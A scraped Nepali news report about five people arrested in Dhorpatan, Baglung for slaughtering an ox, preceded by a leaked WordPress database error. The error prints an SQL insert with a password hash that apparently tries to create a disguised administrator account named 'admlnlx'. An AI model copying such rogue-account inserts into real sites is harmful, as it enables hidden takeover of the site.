WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B4Fl2qCOcKLi2KcFRnv8/Mg84HidDT.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 19:05:22', '', 'admlnlx', 'admlnlx')
बलेवा । गोरु काटेको अभियोगमा ढोरपाटन नगरपालिका–८ का पाँच जना पक्राउ परेका छन् । पक्राउ पर्नेमा ढोरपाटन –८ भित्ताटोलका ४९ वर्षीय मनबहादुर विक, ४४ वर्षीय नन्दराम विक, ३८ वर्षीया पुनी विक, २६ वर्षीया मीना विक र ढोरपाटन –२ घर भई हाल वडा नं ८ भित्ताटोल बस्ने ३६ वर्षीय हरि परियार रहेका छन् ।
सुराकीका आधारमा घटनास्थलमा पुगेको प्रहरी चौकी ढोरपाटनको टोलीले उनीहरुलाई गोरुको मासुसहित नियन्त्रणमा लिएको प्रहरी नायब उपरीक्षक इग्वाल हवारीले जानकारी दिए । उनीहरुलाई जिल्ला प्रहरी कार्यालय बागलुङ ल्याई अनुसन्धान थालिएको उहाँले बताए । रासस